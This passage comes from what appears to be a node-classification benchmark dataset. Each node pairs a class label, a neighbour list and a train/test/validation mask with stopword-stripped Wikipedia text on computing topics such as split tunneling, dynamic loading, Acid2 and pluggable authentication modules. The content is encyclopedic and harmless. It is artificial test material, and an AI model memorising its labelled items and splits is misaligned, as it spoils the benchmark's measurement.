      4841,
      6380,
      5742,
      9455,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 2135,
    "label": 3,
    "text": "Lawrence_Livermore_National_Laboratory:lawrence livermore national laboratory lawrence livermore national laboratory llnl federal research facility livermore california united states founded university california berkeley 1952 originally branch lawrence berkeley national laboratory lawrence livermore laboratory became autonomous 1971 designated national laboratory 1981 federally funded research development center ffrdc lawrence livermore lab primarily funded u.s. department energy doe managed operated lawrence livermore national security llc llns partnership university california bechtel bwx technologies aecom battelle memorial institute affiliation texas university system 2012 laboratory synthetic chemical element livermorium named llnl self-described premier research development institution science technology applied national security principal responsibility ensuring safety security reliability nation nuclear weapons application advanced science engineering technology laboratory also applies special expertise multidisciplinary capabilities preventing proliferation use weapons mass destruction bolstering homeland security solving nationally important problems including energy environmental security basic science economic competitiveness laboratory located one-square-mile 2.6 km site eastern edge livermore also operates remote experimental test site called site 300 situated southeast main lab site llnl annual budget 1.5 billion staff roughly 5,800 employees llnl established 1952 university california radiation laboratory livermore offshoot existing uc radiation laboratory berkeley intended spur innovation provide competition nuclear weapon design laboratory los alamos new mexico home manhattan project developed first atomic weapons edward teller ernest lawrence director radiation laboratory berkeley regarded co-founders livermore facility new laboratory sited former naval air station world war ii already home several uc radiation laboratory projects large location berkeley hills uc campus including one first experiments magnetic approach confined thermonuclear reactions i.e fusion half hour southeast berkeley livermore site provided much greater security classified projects urban university campus lawrence tapped former graduate student herbert york age 32 run livermore york lab four main programs project sherwood magnetic-fusion program project whitney weapons-design program diagnostic weapon experiments los alamos livermore laboratories basic physics program york new lab embraced lawrence big science approach tackling challenging projects physicists chemists engineers computational scientists working together multidisciplinary teams lawrence died august 1958 shortly university board regents named laboratories lawrence radiation laboratory historically berkeley livermore laboratories close relationships research projects business operations staff livermore lab established initially branch berkeley laboratory livermore lab officially severed administratively berkeley lab 1971 day official planning documents records lawrence berkeley national laboratory designated site 100 lawrence livermore national lab site 200 llnl remote test location site 300 laboratory renamed lawrence livermore laboratory lll 1971 october 1 2007 llns assumed management llnl university california exclusively managed operated laboratory since inception 55 years laboratory honored 2012 synthetic chemical element livermorium named llns takeover laboratory controversial may 2013 alameda county jury awarded 2.7 million five former laboratory employees among 430 employees llns laid 2008 jury found llns breached contractual obligation terminate employees reasonable cause five plaintiffs also pending age discrimination claims llns heard different jury separate trial 125 co-plaintiffs awaiting trial similar claims llns may 2008 layoff first layoff laboratory nearly 40 years march 14 2011 city livermore officially expanded city boundaries annex llnl move within city limits unanimous vote livermore city council expanded livermore southeastern boundaries cover 15 land parcels covering comprise llnl site site formerly unincorporated area alameda county llnl campus continues owned federal government inception livermore focused new weapon design concepts result first three nuclear tests unsuccessful lab persevered subsequent designs proved increasingly successful 1957 livermore lab selected develop warhead navy polaris missile warhead required numerous innovations fit nuclear warhead relatively small confines missile nosecone cold war many livermore-designed warheads entered service used missiles ranging size lance surface-to-surface tactical missile megaton-class spartan antiballistic missile years llnl designed following warheads w27 regulus cruise missile 1955 joint los alamos w38 atlas/titan icbm 1959 b41 b52 bomb 1957 w45 little john/terrier missiles 1956 w47 polaris slbm 1957 w48 155-mm howitzer 1957 w55 submarine rocket 1959 w56 minuteman icbm 1960 w58 polaris slbm 1960 w62 minuteman icbm 1964 w68 poseidon slbm 1966 w70 lance missile 1969 w71 spartan missile 1968 w79 8-in artillery gun 1975 w82 155-mm howitzer 1978 b83 modern strategic bomb 1979 w87 peacekeeper/mx icbm 1982 w87 b83 llnl designs still u.s. nuclear stockpile collapse soviet union 1991 end cold war united states began moratorium nuclear testing development new nuclear weapon designs sustain existing warheads indefinite future science-based stockpile stewardship program ssp defined emphasized development application greatly improved technical capabilities assess safety security reliability existing nuclear warheads without use nuclear testing confidence performance weapons without nuclear testing maintained ongoing process stockpile surveillance assessment certification refurbishment weapon replacement new designs nuclear weapons warheads u.s. stockpile must continue function far past original expected lifetimes components materials age problems arise stockpile life extension programs extend system lifetimes also introduce performance uncertainties require maintenance outdated technologies materials concern become increasingly difficult maintain high confidence current warheads long term department energy/national nuclear security administration initiated reliable replacement warhead rrw program rrw designs could reduce uncertainties ease maintenance demands enhance safety security march 2007 llnl design chosen reliable replacement warhead since time congress allocated funding development rrw llnl conducts research properties behavior plutonium learn plutonium performs ages behaves high pressure e.g. impact high explosives plutonium seven temperature-dependent solid allotropes possesses different density crystal structure alloys plutonium even complex multiple phases present sample given time experiments conducted llnl elsewhere measure structural electrical chemical properties plutonium alloys determine materials change time measurements enable scientists better model predict plutonium long-term behavior aging stockpile lab plutonium research conducted specially designed facility called superblock emphasis safety security work highly enriched uranium also conducted march 2008 national nuclear security administration nnsa presented preferred alternative transformation nation nuclear weapons complex plan llnl would center excellence nuclear design engineering center excellence high explosive research development science magnet high-energy-density i.e. laser physics addition special nuclear material would removed consolidated central yet-to-be-named site september 30 2009 nnsa announced two thirds special nuclear material e.g. plutonium llnl requiring highest level security protection removed llnl move part nnsa efforts initiated october 2006 consolidate special nuclear material five sites 2012 significantly reduced square footage sites 2017 federally mandated project intends improve security reduce security costs part nnsa overall effort transform cold war era nuclear weapons enterprise 21st-century nuclear security enterprise original date remove high-security nuclear material llnl based equipment capability capacity 2014 nnsa llnl developed timeline remove material early possible accelerating target completion date 2012 lab work global security aims reduce mitigate dangers posed spread use weapons mass destruction threats energy environmental security livermore working global security homeland security decades predating collapse soviet union 1991 september 11 2001 terrorist attacks llnl staff heavily involved cooperative nonproliferation programs russia secure at-risk weapons materials assist former weapons workers developing peaceful applications self-sustaining job opportunities expertise technologies mid-1990s lab scientists began efforts devise improved biodetection capabilities leading miniaturized autonomous instruments detect biothreat agents minutes instead days weeks previously required dna analysis today livermore researchers address spectrum threats – radiological/nuclear chemical biological explosives cyber combine physical life sciences engineering computations analysis develop technologies solve real-world problems activities grouped five programs llnl supports capabilities broad range scientific technical disciplines applying current capabilities existing programs developing new science technologies meet future national needs lawrence livermore national laboratory worked several energy technologies field coal gasification shale oil extraction geothermal energy advanced battery research solar energy fusion energy main oil shale processing technologies worked lawrence livermore national laboratory llnl hrs hot-recycled-solid llnl rise situ extraction technology llnl radiofrequency technologies 60-year history lawrence livermore made many scientific technological achievements including july 17 2009 llnl announced laboratory received eight r 100 awards – ever received annual competition previous llnl record seven awards reached five times – 1987 1988 1997 1998 2006 also known oscars invention awards given year development cutting-edge scientific engineering technologies commercial potential awards raise llnl total number awards since 1978 129 october 12 2016 llnl released results computerized modeling mars moon phobos finding connection keeping earth safe asteroids throughout history llnl leader computers scientific computing even livermore lab opened doors e.o lawrence edward teller recognized importance computing potential computational simulation purchase one first univac computers set precedent llnl history acquiring exploiting fastest capable supercomputers world succession increasingly powerful fast computers used lab years llnl researchers use supercomputers answer questions subjects materials science simulations global warming reactions natural disasters llnl long history developing computing software systems initially commercially available software computer manufacturers considered customer responsibility develop users early computers write codes solve technical problems also routines run machines today llnl computer scientists focus creating highly complex physics models visualization codes unique applications tailored specific research requirements great deal software also written llnl personnel optimize operation management computer systems including operating system extensions chaos linux clustering resource management packages slurm llnl also initiated continues leading development zfs linux official port zfs linux operating system august 2009 joint venture announced sandia national laboratories/california campus llnl create open unclassified research development space called livermore valley open campus lvoc motivation lvoc stems current future national security challenges require increased coupling private sector understand threats deploy solutions areas high performance computing energy environmental security cyber security economic security non-proliferation lvoc modeled research development campuses found major industrial research parks u.s. department energy laboratories campus-like security set business operating rules devised enhance accelerate international scientific collaboration partnerships u.s. government agencies industry academia ultimately lvoc consist approximately 110-acre parcel along eastern edge livermore laboratory sandia sites house additional conference space collaboration facilities visitor center support educational research activities objectives lvoc llnl principal sponsor department energy/national nuclear security administration doe/nnsa office defense programs supports stockpile stewardship advanced scientific computing programs funding support llnl global security homeland security work comes doe/nnsa office defense nuclear nonproliferation well department homeland security llnl also receives funding doe office science office civilian radioactive waste management office nuclear energy addition llnl conducts work-for-others research development various defense department sponsors federal agencies including nasa nuclear regulatory commission nrc national institutes health environmental protection agency number california state agencies private industry fiscal year 2009 llnl spent 1.497 billion research laboratory operations activities research/science budget site management/operations budget llnl director appointed board governors lawrence livermore national security llc llns reports board laboratory director also serves president llns course history following scientists served llnl director llnl director supported senior executive team consisting deputy director deputy director science technology principal associate directors senior executives manage areas/functions directly reporting laboratory director directors office organized functional areas/offices laboratory organized four principal directorates headed principal associate director three directorates headed associate director reports llnl director llnl director reports lawrence livermore national security llc llns board governors group key scientific academic national security business leaders llns partner companies jointly control llns llns board governors total 16 positions six governors constituting executive committee decisions board made governors executive committee governors advisory executive committee voting rights university california entitled appoint three governors executive committee including chair bechtel also entitled appoint three governors executive committee including vice chair one bechtel governors must representative babcock wilcox b w washington division urs corporation urs nominated jointly b w urs year must approved appointed bechtel executive committee seventh governor appointed battelle non-voting advisory executive committee remaining board positions known independent governors also referred outside governors selected among individuals preferably national stature employees officers partner companies university california-appointed chair tie-breaking authority decisions executive committee board governors ultimate governing body llns charged overseeing affairs llns operations management llnl llns managers employees work llnl including president/laboratory director generally referred laboratory employees laboratory employees report directly indirectly llns president work performed llnl funded federal government laboratory employees paid llns responsible aspects employment including providing health care benefits retirement programs within board governors authority resides executive committee exercise rights powers authorities llns excepting certain decisions reserved parent companies llns executive committee free appoint officers managers llns llnl may delegate authorities deems appropriate officers employees representatives llns/llnl executive committee may also retain auditors attorneys professionals necessary part executive committee appointed senior managers llnl primary officers llns practical matter operational decisions delegated president llns also laboratory director positions president/laboratory director deputy laboratory director filled joint action chair vice chair executive committee university california nominating president/laboratory director bechtel nominating deputy laboratory director current llns chairman norman j. pattiz founder chairman westwood one america largest radio network also currently serves board regents university california vice chairman j. scott ogilvie president bechtel systems infrastructure inc. also serves board directors bechtel group inc. bgi bgi audit committee livermore action group organized many mass protests 1981 1984 nuclear weapons produced lawrence livermore national laboratory peace activists ken nightingale eldred schneider involved june 22 1982 1,300 anti-nuclear protesters arrested nonviolent demonstration recently annual protest nuclear weapons research lawrence livermore august 2003 1,000 people protested livermore labs new-generation nuclear warheads 2007 protest 64 people arrested 80 people arrested march 2008 protesting gates",
    "neighbors": [
      3328,
      7684,
      6917,
      7432,
      1933,
      11661,
      10641,
      5523,
      7703,
      5015,
      1823,
      9255,
      11255,
      823,
      5699,
      4548,
      7766,
      11353,
      11613,
      10596,
      11495,
      8301,
      3055,
      4981,
      3446,
      6518,
      11517,
      3582,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 2136,
    "label": 4,
    "text": "Split_tunneling:split tunneling split tunneling computer networking concept allows mobile user access dissimilar security domains like public network e.g. internet local lan wan time using different network connections connection state usually facilitated simultaneous use local area network lan network interface card nic radio nic wireless local area network wlan nic vpn client software application without benefit access control example suppose user utilizes remote access vpn software client connecting corporate network using hotel wireless network user split tunneling enabled able connect file servers database servers mail servers servers corporate network vpn connection user connects internet resources web sites ftp sites etc connection request goes directly gateway provided hotel network split tunneling sometimes categorized based configured split tunnel configured tunnel traffic destined specific set destinations called split-include tunnel configured accept traffic except traffic destined specific set destinations called split-exclude tunnel one advantage using split tunneling alleviates bottlenecks conserves bandwidth internet traffic pass vpn server another advantage case user works supplier partner site needs access network resources networks throughout day split tunneling prevents user continually connect disconnect disadvantage split tunneling enabled users bypass gateway level security might place within company infrastructure example web content filtering place something usually controlled gateway level client pc isps implement dns hijacking break name resolution private addresses split tunnel variant split tunneling called inverse split tunneling default datagrams enter tunnel except destination ips explicitly allowed vpn gateway criteria allowing datagrams exit local network interface outside tunnel may vary vendor vendor i.e port service etc keeps control network gateways centralized policy device vpn terminator augmented endpoint policy enforcement technologies interface firewall endpoint device network interface driver group policy object anti-malware agent related many ways network access control nac internal ipv6 content hosted presented sites via unique local address range vpn level external ipv4 ipv6 content accessed via site routers",
    "neighbors": [
      10889,
      9722,
      8211,
      11162,
      3742,
      9764,
      4268,
      10417,
      7859,
      2228,
      3777,
      2884,
      5959,
      8265,
      11468,
      7376,
      11606,
      9048,
      6490,
      6364,
      5084,
      5470,
      10210,
      9318,
      8039,
      11248,
      5749,
      8054,
      3322
    ],
    "mask": "None"
  },
  {
    "node_id": 2137,
    "label": 3,
    "text": "Rodos_(operating_system):rodos operating system rodos realtime onboard dependable operating system real-time operating system embedded systems designed application domains demanding high dependability rodos developed german aerospace center roots operating system boss used current micro satellite program german aerospace center system runs operational satellite tet-1 used currently developed satellite biros rodos enhanced extended german aerospace center well department aerospace information technology university würzburg important aspect rodos integrated real time middleware developing control payload software top middleware provides maximum modularity today applications/modules developed independently simple interchange modules later without worrying side effects modules encapsulated building blocks bb accessed access resources well defined interfaces rodos implemented software framework c++ object oriented application interface api organized layers lowest layer 1 responsible control embedded system hardware hal hardware abstraction layer next layer 2 kernel administrates local resources threads time top kernel middleware layer 3 enables communication bbs using publisher subscriber multicast protocol top middleware user may implement applications layer 4 distributed software network simple bbs building blocks api top middleware service oriented interface bbs interact providing services bbs using services bbs mentioned original purpose rodos control satellites designed brain avionic system introduces first time 2001 networkcentric concept networkcentric core avionics machine consists several harmonized components work together implement dependable computing simple way networkcentric system software network bbs hardware network interconnecting vehicles radio communication computers inside vehicles buses point point links intelligent devices attached buses simple devices attached front end computers communicate node external units including devices computing units node provides gateway network around network several devices io devs computing nodes may attached system messages exchange provided middleware gateways asynchronous using publisher-subscriber protocol fixed communication paths established system reconfigured easily run-time instance several replicas software run different nodes publish result using topic without knowing voter may subscribe topic vote correct result application migrate node node even vehicles without reconfigure communication system core middleware distributes messages locally using integrated gateways networkcentric network messages reach node application network communication whole system includes software applications computing nodes even io devices publishers make messages public given topic subscribers zero one given topic get messages published topic mentioned communication difference node computing unit device publisher subscribers running beyond may combination software tasks hardware devices establish transfer path publisher subscriber must share topic topic pair consisting data-type integer representing topic identifier software middleware hardware network switch called middleware switch interpret publisher/subscriber protocol rodos enables user write realtime applications different architectures easy efficient way development special attention paid implement various features rodos simple nevertheless robust way unnecessary complexity avoided provide user straightforward clearly arranged system rodos supports typical features realtime operatingsystems like threads semaphores among features rodos offers common hello world example program looks like rodos class helloworld public thread helloworld class thread extended custom run procedure writes hello world standard output printf rodos components needed application development accessible via rodos.h header file rodos uses fair priority controlled preemptive scheduling thread highest priority executed running threads lower priority paused preemptive multitasking one threads priority gets fixed share computing time executed turns example class highprioritythread public thread public highprio class lowprioritythread public thread public lowprio thread lowprioritythread constantly writes character interrupted every second thread highprioritythread writes character rodos uses so-called topics enable communication threads gateways different systems topic represents message certain kind thread publish topics well subscribe topic receive messages belong type message message system conforms publish–subscribe pattern simple example one publisher one subscriber use topic counter1 containing one integer value example topic long counter1 -1 counter1 class mypublisher public thread public publisher class mysubscriber public subscriberreceiver long public subscriber publisher-thread post every three seconds ascending counter value subscriber-thread simply displays received integer value supported instruction set architectures furthermore rodos run guest different host operating system",
    "neighbors": [
      7170,
      8262,
      9225,
      9932,
      5358,
      2517,
      3197,
      823,
      9366,
      1849,
      2811,
      8700,
      477,
      6207
    ],
    "mask": "None"
  },
  {
    "node_id": 2138,
    "label": 2,
    "text": "Dynamic_loading:dynamic loading dynamic loading mechanism computer program run time load library binary memory retrieve addresses functions variables contained library execute functions access variables unload library memory one 3 mechanisms computer program use software two static linking dynamic linking unlike static linking dynamic linking dynamic loading allows computer program start absence libraries discover available libraries potentially gain additional functionality dynamic loading common technique ibm operating systems system/360 os/360 particularly i/o subroutines cobol pl/i runtime libraries continues used ibm operating systems z/architecture z/os far application programmer concerned loading largely transparent since mostly handled operating system i/o subsystem main advantages ibm strategic transaction processing system cics 1970s onwards uses dynamic loading extensively kernel normal application program loading corrections application programs could made offline new copies changed programs loaded dynamically without needing restart cics frequently run 24/7 shared libraries added unix 1980s initially without ability let program load additional libraries startup dynamic loading frequently used implementing software plugins example apache web server codice_1 dynamic shared object plugin files libraries loaded runtime dynamic loading dynamic loading also used implementing computer programs multiple different libraries may supply requisite functionality user option select library libraries provide systems support dynamic loading unix-like operating systems macos linux solaris provide dynamic loading c programming language dl library windows operating system provides dynamic loading windows api loading library accomplished codice_2 codice_3 windows codice_4 unix-like operating systems examples follow unix library macos framework framework bundle contains objective-c code extracting contents dynamically loaded library achieved codice_5 windows codice_6 unix-like operating systems macos using objective-c bundles one also result codice_7 codice_8 converted desired destination used windows case conversion straightforward since farproc essentially already function pointer problematic address object retrieved rather function however usually one wants extract functions anyway normally problem according posix specification result codice_7 codice_10 pointer however function pointer required even size data object pointer therefore valid conversion type codice_11 pointer function may easy implement platforms systems use today function object pointers de facto convertible following code snippet demonstrates one workaround allows perform conversion anyway many systems snippet give warning compilers codice_12 another workaround disables warning even strict aliasing effect makes use fact reading different union member one recently written called type punning common explicitly allowed even strict aliasing force provided memory accessed union type directly however strictly case since function pointer copied used outside union note trick may work platforms size data pointers size function pointers fact remains conversion function data object pointers regarded inherently non-portable implementation extension correct way direct conversion exists since regard posix iso standards contradict problem posix documentation codice_7 outdated issue 6 stated future version may either add new function return function pointers current interface may deprecated favor two new functions one returns data pointers returns function pointers subsequent version standard issue 7 2008 problem discussed conclusion function pointers convertible codice_11 posix compliance requires compiler makers implement working cast case contents library changed i.e case custom library addition function pointer exported since pointer function pointer object pointer pointer always legally retrieved call codice_7 subsequent conversion however approach requires maintaining separate pointers functions used externally benefits usually small loading library causes memory allocated library must deallocated order avoid memory leak additionally failure unload library prevent filesystem operations computer file|file contains library unloading library accomplished codice_16 microsoft windows|windows codice_17 unix-like operating system s. however unloading dll lead program crashes objects main application refer memory allocated within dll example dll introduces new class dll closed operations instances class main application likely cause memory access violation likewise dll introduces factory function instantiating dynamically loaded classes calling dereferencing function dll closed leads undefined behaviour implementations dynamic loading unix-like operating systems microsoft windows|windows allow programmers extract symbols currently executing process unix-like operating systems allow programmers access global symbol table includes main executable subsequently loaded dynamic libraries microsoft windows|windows allows programmers access symbols exported main executable windows use global symbol table api search across multiple modules find symbol name java programming language java class|classes dynamically loaded using object example reflection mechanism also provides means load class n't already loaded uses classloader current class however simple way unload class controlled way loaded classes unloaded controlled way i.e programmer wants happen classloader used load class system class loader unloaded various details need observed ensure class really unloaded makes unloading classes tedious implicit unloading classes i.e uncontrolled way garbage collector changed times java java 1.2. garbage collector could unload class whenever felt needed space independent class loader used load class starting java 1.2 classes loaded via system classloader never unloaded classes loaded via classloaders classloader unloaded starting java 6 classes contain internal marker indicating garbage collector unloaded garbage collector desires independent classloader used load class garbage collector free ignore hint similarly libraries implementing native methods dynamically loaded using codice_18 method codice_19 method despite promulgation 1980s unix windows systems still chose add—or even remove—dynamic loading example plan 9 bell labs successor 9front consider dynamic linking harmful purposefully support go programming language |go programming language developers plan 9 also support dynamic linking plugin loading available since go 1.8 february 2017 go runtime library functions statically linked compiled binary category computer libraries category operating system technology",
    "neighbors": [
      2432,
      1922,
      8966,
      6664,
      6797,
      5658,
      1435,
      5154,
      7717,
      4777,
      10284,
      5679,
      7983,
      8502,
      823,
      7607,
      10176,
      1106,
      2141,
      865,
      5220,
      2804,
      2168,
      3577,
      5754,
      3323,
      3197,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 2139,
    "label": 8,
    "text": "Acid2:acid2 acid2 test page published promoted web standards project expose web page rendering flaws web browsers applications render html named acid test gold developed spirit acid1 relatively narrow test compliance cascading style sheets 1.0 css1 standard released 13 april 2005 acid1 application passes test way displays test page matches reference image acid2 tests aspects html markup css 2.1 styling png images data uris acid2 test page displayed correctly application follows world wide web consortium internet engineering task force specifications technologies specifications known web standards describe technologies used web expected function acid2 designed microsoft internet explorer particularly mind creators acid2 dismayed internet explorer follow web standards prone display web pages differently browsers causing web developers spend time tweaking web pages acid2 challenged microsoft make internet explorer comply web standards acid2 released 13 april 2005 31 october 2005 safari 2.0.2 became first browser pass acid2 opera konqueror firefox others followed release internet explorer 8 19 march 2009 latest versions major desktop web browsers pass test ie10 released fails test successor microsoft edge able render correctly windows 10 version 1607 acid2 followed acid3 test fails browsers become compliant current css collapse margin standards acid2 first proposed håkon wium lie chief technical officer opera software creator widely used cascading style sheets web standard 16 march 2005 article cnet lie expressed dismay microsoft internet explorer properly support web standards hence completely interoperable browsers announced acid2 would challenge microsoft design internet explorer 7 development achieve greater degree standards compliance previous versions internet explorer original acid1 test forced browser makers fix applications face embarrassment lie hoped acid2 would lie colleague ian hickson created first draft test february 2005 ian hickson coded final test collaboration web standards project larger web community officially released 13 april 2005 time every web browser failed spectacularly 23 april 2005 acid2 updated fix bug made mouth appear close nose several complaints test updated january 2006 remove test unpopular sgml-style comments never widely implemented browsers implement sgml-style comments original test displayed word error bottom part face march 2008 ian hickson released acid3 follow-up acid2 acid2 primarily tests css acid3 focuses javascript web 2.0 technologies july 2005 chris wilson internet explorer platform architect stated passing acid2 priority internet explorer 7 describing test wish list features rather true test standards compliance december 2007 microsoft announced changes required pass acid2 would made available internet explorer 8 changes would turned default meaning ie8 would actually pass test concern switching new behavior would cause many problems web pages expecting internet explorer old non-compliant behavior march 2008 microsoft released ie8 beta 1 turned changes default james pratt product manager ie8 explained decision made developers spend time building features cool stuff less time trying tweak sites across different browsers another unresolved standards compliance issue caused ie8 beta 1 fail elements test hosted server august 2008 microsoft released ie8 beta 2 resolved issue beta however standards mode turned default pages loaded intranet zone zone active pages loaded via unc paths named addresses without dots like nowiki http //mysite/ /nowiki sites bypass proxy settings ie8 pass acid2 test loaded cases acid2 tests variety web standards published world wide web consortium internet engineering task force exception css 2.1 web standards tested codified year 2000 css 2.1 candidate recommendation time acid2 release still candidate recommendation 23 april 2009 specifically acid2 tests acid2 comprehensive test guarantee total conformance particular standard variant acid2 test test data uri support also available web standards project passing score considered valid browser default settings used actions changing font sizes zoom level applying user stylesheets break display test expected relevant browser compliance following browser settings user actions invalidate test rendered correctly acid2 appear smiley face text hello world user browser nose turning blue mouse cursor hovers time test release every browser failed number browsers pass see list even though opera mini based rendering engine opera personal computers pass acid2 test opera mini intentionally reformats web pages try make suitable devices small screens following list releases noting significant releases applications passed test new applications passed acid2 since first official release included timeline",
    "neighbors": [
      3462,
      8584,
      6539,
      6028,
      6797,
      6034,
      11418,
      6171,
      10525,
      417,
      7713,
      7346,
      823,
      11449,
      9275,
      9029,
      10057,
      11469,
      3407,
      8021,
      4310,
      5078,
      6231,
      8281,
      8923,
      5605,
      4326,
      487,
      5869,
      494,
      8557,
      4725,
      5114,
      124,
      637
    ],
    "mask": "Test"
  },
  {
    "node_id": 2140,
    "label": 7,
    "text": "Dryad_(programming):dryad programming dryad research project microsoft research general purpose runtime execution data parallel applications microsoft made several preview releases technology available add-ons windows hpc server 2008 r2 however october 2011 microsoft discontinued active development dryad shifting focus apache hadoop framework application written dryad modeled directed acyclic graph dag dag defines dataflow application vertices graph defines operations performed data computational vertices written using sequential constructs devoid concurrency mutual exclusion semantics dryad runtime parallelizes dataflow graph distributing computational vertices across various execution engines multiple processor cores computer different physical computers connected network cluster scheduling computational vertices available hardware handled dryad runtime without explicit intervention developer application administrator network flow data one computational vertex another implemented using communication channels vertices physical implementation realized tcp/ip streams shared memory temporary files stream used runtime transport finite number structured items dryad defines domain-specific language implemented via c++ library used create model dryad execution graph computational vertices written using standard c++ constructs make accessible dryad runtime must encapsulated class inherits codice_1 base class graph defined adding edges edges added using composition operator defined dryad connects two graphs two nodes graph edge managed code wrappers dryad api also written exist several high-level language compilers use dryad runtime examples include scope structured computations optimized parallel execution dryadlinq",
    "neighbors": [
      2432,
      9224,
      785,
      7313,
      7699,
      7963,
      6815,
      5920,
      2210,
      5798,
      9126,
      6184,
      2345,
      4909,
      7983,
      7218,
      10675,
      8501,
      2358,
      7482,
      5948,
      4286,
      2113,
      4417,
      8514,
      5956,
      9926,
      4423,
      1480,
      6909,
      330,
      1866,
      7497,
      8523,
      2641,
      3922,
      4308,
      2008,
      344,
      2394,
      731,
      2264,
      11487,
      4194,
      5090,
      11618,
      7142,
      5223,
      2536,
      8810,
      4205,
      6774,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "None"
  },
  {
    "node_id": 2141,
    "label": 2,
    "text": "Preference_Pane:preference pane preference pane often abbreviated prefpane special dynamically loaded plugin macos introduced mac os x v10.0 purpose preference pane allow user set preferences specific application system means graphical user interface preference panes macos replacement control panels classic mac os prior mac os x v10.4 collections preference panes featured show button show panes collection customizable toolbar frequently-used preference panes could dragged mac os x v10.3 currently-active pane would also highlighted toolbar selected mac os x v10.4 functionality dropped favor plain show button back/forward history arrows system preferences application whose sole purpose loading various preference panes system configuration application written use prefpanes preference panes carry .prefpane file extension",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      1686,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      1699,
      811,
      3371,
      5292,
      1710,
      6700,
      8877,
      4657,
      1074,
      10036,
      3766,
      2232,
      9529,
      9912,
      11257,
      9406,
      576,
      1729,
      6849,
      4933,
      713,
      9418,
      9035,
      9802,
      6093,
      3790,
      7118,
      5713,
      1878,
      3670,
      4184,
      3289,
      2138,
      3035,
      4571,
      9430,
      4318,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      5619,
      2676,
      6771,
      7928,
      8441,
      7163,
      7422,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 2142,
    "label": 7,
    "text": "HCentive:hcentive hcentive inc. based reston virginia software development company specializing cloud-based products health insurers state health agencies first company build health insurance exchange solution ground-up post affordable care act aca hcentive involved development state private health insurance marketplaces exchanges state organizations health insurance providers companies third party administrators works three top five health insurance organizations us 125 employees hcentive work corporate headquarters others based indian r center hcentive founded 2009 sanjay singh manoj agarwala tarun upadhyay started activities affordable care act became law expecting would create new market idea founding hcentive company emerged concepts aca health care reform debated united states congress company ’ ceo sanjay singh software engineer emigrated india 2000 singh co-founded globallogic software services company vienna virginia next fourteen years grew 7,000 employees webinsure state cloud-hosted solution state-based health insurance exchanges states new york colorado kentucky chosen product state health insurance marketplaces company also offers products private market webinsure private exchange solution cloud-based solution health plans tpas dental plans webinsure exchange manager integration health insurance exchange health insurance providers related parties august 2013 geisinger health plan ghp health insurance provider began cooperation hcentive implement health insurance exchange integration private exchange solutions rank 62 deloitte technology fast 500 north american 117 inc. 5000 2014 list 12 washington business journal fast 50 2015. ranked 19 among virginia-based companies ranked 117 inc. 5000 2014 list",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 2143,
    "label": 4,
    "text": "Pluggable_authentication_module:pluggable authentication module pluggable authentication module pam mechanism integrate multiple low-level authentication schemes high-level application programming interface api allows programs rely authentication written independent underlying authentication scheme pam first proposed sun microsystems open software foundation request comments rfc 86.0 dated october 1995 adopted authentication framework common desktop environment stand-alone open-source infrastructure pam first appeared red hat linux 3.0.4 august 1996 linux pam project pam currently supported aix operating system dragonfly bsd freebsd hp-ux linux macos netbsd solaris since central standard pam behavior exists later attempt standardize pam part x/open unix standardization process resulting x/open single sign-on xsso standard standard ratified standard draft served reference point later pam implementations example openpam since pam implementations interface remote clients pam implement kerberos common type sso used unix environments led sso incorporation primary authentication portion would-be xsso standard advent technologies spnego sasl lack functionality also reason ssh authentication mechanism negotiation pam implementations pam_krb5 fetches ticket granting tickets involves prompting user credentials used initial login sso environment fetch service ticket particular application prompt user enter credentials application must specifically coded support kerberos pam_krb5 get service tickets although versions pam-krb5 attempting work around issue",
    "neighbors": [
      900,
      4485,
      7,
      9353,
      4113,
      4242,
      3477,
      1304,
      2080,
      2083,
      9635,
      2087,
      9646,
      2228,
      4663,
      823,
      5433,
      5568,
      3521,
      9665,
      8266,
      10058,
      6098,
      4053,
      5077,
      11351,
      8539,
      6750,
      8670,
      2274,
      9699,
      10341,
      8295,
      6888,
      11246,
      1012,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 2144,
    "label": 9,
    "text": "S-attributed_grammar:s-attributed grammar s-attributed grammars class attribute grammars characterized inherited attributes synthesized attributes inherited attributes must passed parent nodes children nodes abstract syntax tree semantic analysis parsing process problem bottom-up parsing bottom-up parsing parent nodes abstract syntax tree created creation children attribute evaluation s-attributed grammars incorporated conveniently top-down parsing bottom-up parsing specifications parser generators yacc family broadly considered s-attributed grammars however parser generators usually include capacity reference global variables and/or fields within given grammar rule meaning pure s-attributed approach s-attributed grammar also l-attributed grammar",
    "neighbors": [
      2256,
      7634,
      2086,
      5399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2145,
    "label": 2,
    "text": "Framework_Class_Library:framework class library framework class library fcl component microsoft .net framework first implementation common language infrastructure cli much way common language runtime clr implements cli virtual execution system ves fcl implements cli foundational standard libraries cli foundational class libraries implementation collection reusable classes interfaces value types includes implementation cli base class library bcl microsoft move .net core cli foundational class libraries implementation known corefx instead framework class library",
    "neighbors": [
      10243,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      8246,
      4178,
      9813,
      603,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      3224,
      4771,
      7846,
      10414,
      214,
      9434,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      4853,
      6927,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1347,
      1348,
      844,
      10079,
      11616,
      2943,
      10624,
      9609,
      3997,
      10654,
      8607,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      2556,
      9726,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 2146,
    "label": 2,
